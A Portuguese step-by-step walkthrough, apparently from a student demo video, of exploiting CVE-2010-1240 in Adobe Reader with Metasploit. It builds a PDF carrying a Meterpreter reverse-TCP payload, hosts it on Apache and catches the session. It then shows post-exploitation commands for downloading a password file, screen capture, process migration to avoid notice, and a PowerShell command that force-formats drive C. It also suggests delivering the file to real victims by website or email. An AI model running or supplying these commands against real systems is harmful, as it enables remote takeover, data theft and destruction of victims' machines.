
Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando o arquivo PDF de aparência inofensiva para o alvo, que na verdade contém um payload embutido. O exploit foi tornado público como CVE-2010-1240.
trazido a você por
Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando um arquivo PDF de aparência inocente para o alvo, que na verdade contém um payload embutido. O exploit foi tornado público como CVE-2010-1240.
Assim que o PDF é aberto no Adobe Reader, os usuários que são enganados por nós para concordarem com os pop-ups de segurança nos permitirão obter uma sessão meterpreter conectada aos seus dispositivos via conexão TCP reversa. Até esse momento, todos os seus dados e o que estão fazendo agora estão sob nossa vigilância.

Primeiro, iniciamos o MSFconsole que fornece uma interface de linha de comando para acessarmos o framework Metasploit.
msfconsole
Em seguida, pesquisamos por exploits que correspondem ao nosso alvo Windows e ao Adobe PDF Reader, onde será exibida uma lista completa de exploits que podem ser usados para invadir a máquina Windows da vítima e explorar as vulnerabilidades do Adobe PDF Reader.
search type:exploit platform:windows adobe pdf
Nesta exploração, selecionamos e utilizamos o módulo "adobe_pdf_embedded_exe" usando o comando abaixo para atingir o objetivo de invadir a vítima.
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Também podemos verificar as informações do exploit usando o comando “info” conforme mostrado abaixo:
info
Em seguida, definimos o payload para usar conexão TCP reversa. Usamos também o Meterpreter que fornece um shell interativo que facilita o uso de todos os tipos de funções ao inserir e executar código para explorar a máquina da vítima.
set payload windows/meterpreter/reverse_tcp
Então, definiremos o host e a porta de escuta. Para LHOST, precisamos colocar o endereço IP da máquina do atacante, que neste caso é o endereço IP da nossa máquina Kali (10.0.2.4)*.
*obs.*
Enquanto isso, para LPORT, cabe a nós definir um número de porta que não seja comumente usado.
# para verificar o endereço IP da máquina Kali
ifconfig
set LHOST *10.0.2.4*
set LPORT 5665
Em seguida, definiremos o arquivo de entrada para a base do PDF com a flag INFILENAME*. A seguir, definiremos o nome do arquivo para algo que atraia o interesse da vítima para abrir o arquivo PDF malicioso.
*obs.*
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
Podemos visualizar nossas opções novamente antes de digitar o comando “exploit” para gerar o payload junto com o PDF.
# Então podemos mostrar as informações ou opções com
show info | show options
exploit
Quando terminarmos de gerar o arquivo PDF, moveremos o arquivo para /var/www/html, que é o diretório da nossa máquina Kali para hospedar o servidor de aplicação web para a vítima baixar o arquivo PDF posteriormente.
Nota:
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
Em seguida, para configurar nosso listener, usaremos "exploit/multi/handler". Novamente, definiremos o payload, LHOST, LPORT alinhados com o que definimos ao gerar o arquivo PDF malicioso. Então executaremos o payload.
Nota:
show info ou show options é um comando opcional para executar.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
Em outro terminal, verificamos o status do servidor Apache para garantir que ele está em execução para hospedar nosso arquivo PDF em /var/www/html para a vítima baixar o arquivo.
service apache2 status
# Se estiver inativo, inicie o serviço
service apache2 start
Na máquina Windows, abra qualquer navegador, como Chrome, e digite o IP da nossa Kali (10.0.2.4)* para acessar o servidor de aplicação web da máquina Kali.
*Nota: Observe o endereço IP da sua própria máquina Kali
Em seguida, simule um usuário salvando o arquivo PDF pretendido.
Assim que o arquivo for aberto pela vítima no Adobe Reader 8.1.2 com a aceitação das mensagens de segurança do prompt, podemos observar em nossa máquina Kali que temos uma nova sessão conectada via conexão TCP reversa.
Em um cenário real, configuraremos um site com o PDF de payload embutido para permitir que a vítima baixe ou anexe o arquivo via e-mail.
Então, podemos acessar remotamente a máquina da vítima e, em seguida, realizar mais comportamentos maliciosos que desejamos na sessão do meterpreter.
help
pwd
ls
Por exemplo, se houver um arquivo chamado password.txt, podemos emitir o comando download password.txt
download [folder name | filename with extension]
Claro, podemos escrever script malicioso (implantando backdoor) para nos manter conectados à máquina Windows se formos realmente maus! 💀
# Iniciar prompt de comando em segundo plano
execute -f cmd.exe -H -i
# Criar arquivo no Windows
echo "You have been hacked" > hack.txt
# abrir o arquivo txt que acabamos de criar
hack.txt
# Tirar screenshot
screenshot
# Observar o usuário remoto em tempo real
screenshare
No entanto, o atacante pode reduzir a suspeita migrando o processo do meterpreter para um diferente usando o módulo migrate na sessão do meterpreter.
meterpreter> run post/windows/manage/migrate
Aqui, ele irá gerar automaticamente um novo processo na máquina da vítima para o qual migrar. A vítima poderá então deletar o arquivo PDF infectado, completamente inconsciente de que o processo já foi para outro lugar.
O atacante pode criar ainda mais scripts maliciosos na máquina alvo usando o prompt de comando (cmd) ou PowerShell, que são capazes de derrubar todo o sistema operacional para que não funcione corretamente.
meterpreter> shell
# Iniciar o Windows PowerShell
powershell
# Comando PowerShell para formatar a unidade C à força.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false